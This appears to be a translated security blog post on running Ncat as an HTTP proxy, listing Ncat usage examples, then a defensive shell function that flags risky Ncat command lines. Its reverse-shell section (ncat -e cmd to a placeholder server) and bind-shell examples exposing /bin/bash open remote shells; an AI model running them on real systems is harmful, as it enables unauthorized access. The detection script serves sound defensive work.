Quickly Creating a Proxy Server with Ncat

wpadmin~September 6, 2018 /InfoSec

Quickly creating a proxy server with Ncat: proxy | reverse shell



Ncat Proxy Options – Ncat Documentation

The currently available protocols in connect mode are http (CONNECT), socks4 (SOCKSv4), and socks5 (SOCKSv5). The only server currently supported is http. If this option is not used, the default protocol is http.

Note: although socks4 and socks5 appear among the option values, Ncat currently supports only HTTP when acting as the server.

ncat --proxy-type http -lvp 7878 --ssl
ncat --proxy-type http -lvp 7878
# Other examples
ncat -l 3128 --proxy-type http
ncat -l 3128 --proxy-type http --proxy-auth <user>:<pass>

# Connect to <host> on TCP port 8080.
ncat <host> 8080

# Listen for connections on TCP port 8080.
ncat -l 8080

# Redirect TCP port 8080 on the local machine to <host> on port 80.
ncat --sh-exec "ncat <host> 80" -l 8080 --keep-open

# Bind to TCP port 8081 and attach /bin/bash for the world to access freely.
ncat --exec "/bin/bash" -l 8081 --keep-open

# Bind a shell to TCP port 8081, limit access to hosts on a local
# network, and limit the maximum number of simultaneous connections to 3.
ncat --exec "/bin/bash" --max-conns 3 --allow <local-network> -l 8081 --keep-open

# Connect to smtphost:25 through a SOCKS4 server on port 1080.
ncat --proxy socks4host --proxy-type socks4 --proxy-auth joe smtphost 25

# Connect to smtphost:25 through a SOCKS5 server on port 1080.
ncat --proxy socks5host --proxy-type socks5 --proxy-auth joe:secret smtphost 25

# Create an HTTP proxy server on localhost port 8888.
ncat -l --proxy-type http localhost 8888

# File transfer
# Send a file over TCP port 9899 from host2 (client) to host1 (server).
HOST1$ ncat -l 9899 > outputfile
HOST2$ ncat HOST1 9899 < inputfile

# Transfer in the other direction, turning Ncat into a “one file” server.
HOST1$ ncat -l 9899 < inputfile
HOST2$ ncat HOST1 9899 > outputfile

Reverse shell

# Server
ncat -lvvp 1212
# Client
ncat -e cmd <server> 1212
# The -e option specifies the binary program to forward; on Linux this can be /bin/bash
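
From the defender's side, the listener, proxy and -e patterns above are recognisable in process listings. The following is an added example, not from the original post or the Ncat project: a POSIX shell function (hypothetical name audit_ncat, with labels of its own) that classifies Ncat command lines. The sample lines and the 192.0.2.x address are constructed.

```shell
#!/bin/sh
# Added example: label Ncat command lines (e.g. taken from `ps` output) by risk.
# Labels are this example's own names, not Ncat output.
audit_ncat() (
  # Subshell body keeps the variables and `set -f` local to each call.
  listen=0; shell=0; proxy=0; auth=0; allow=0; ssl=0; loopback=0; out=""
  set -f      # no globbing while splitting
  set -- $1   # naive whitespace split: quoted --sh-exec strings are scanned too
  for tok in "$@"; do
    case "$tok" in
      --listen) listen=1 ;;
      -e|-c|--exec|--sh-exec) shell=1 ;;
      --proxy-type) proxy=1 ;;
      --proxy-auth) auth=1 ;;
      --allow|--allowfile) allow=1 ;;
      --ssl) ssl=1 ;;
      localhost|127.0.0.1|::1) loopback=1 ;;
      --*) ;;               # other long options carry no signal here
      -*l*) listen=1 ;;     # -l, or bundled short options such as -lvp
    esac
  done
  # Connect mode with a program attached: the reverse-shell pattern.
  if [ "$shell" = 1 ] && [ "$listen" = 0 ]; then out="$out connect-exec"; fi
  # Listener with a program attached: bind shell or port redirect.
  if [ "$shell" = 1 ] && [ "$listen" = 1 ]; then
    if [ "$allow" = 1 ]; then out="$out listen-exec-restricted"
    else out="$out listen-exec-open"; fi
  fi
  # --proxy-type on a listener means proxy server; loopback-only is not flagged.
  if [ "$proxy" = 1 ] && [ "$listen" = 1 ] && [ "$loopback" = 0 ]; then
    [ "$auth" = 1 ] || out="$out open-proxy"
    [ "$ssl" = 1 ] || out="$out proxy-no-tls"
  fi
  out=${out# }
  echo "${out:-ok}"
)

# Constructed sample command lines modelled on the examples above.
while IFS= read -r line; do
  printf '%-24s %s\n' "$(audit_ncat "$line")" "$line"
done <<'EOF'
ncat --proxy-type http -lvp 7878
ncat -l 3128 --proxy-type http --proxy-auth user:pass
ncat -l --proxy-type http localhost 8888
ncat --exec /bin/bash -l 8081 --keep-open
ncat -e cmd 192.0.2.10 1212
EOF
```

Client-side use of --proxy-type (connect mode through a SOCKS or HTTP proxy) is deliberately not flagged; only listeners count as proxy servers here.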



@倾旋 我的安全成长口袋

Chapter 17. Ncat Reference Guide


Proxy Options

Ncat Reference Guide
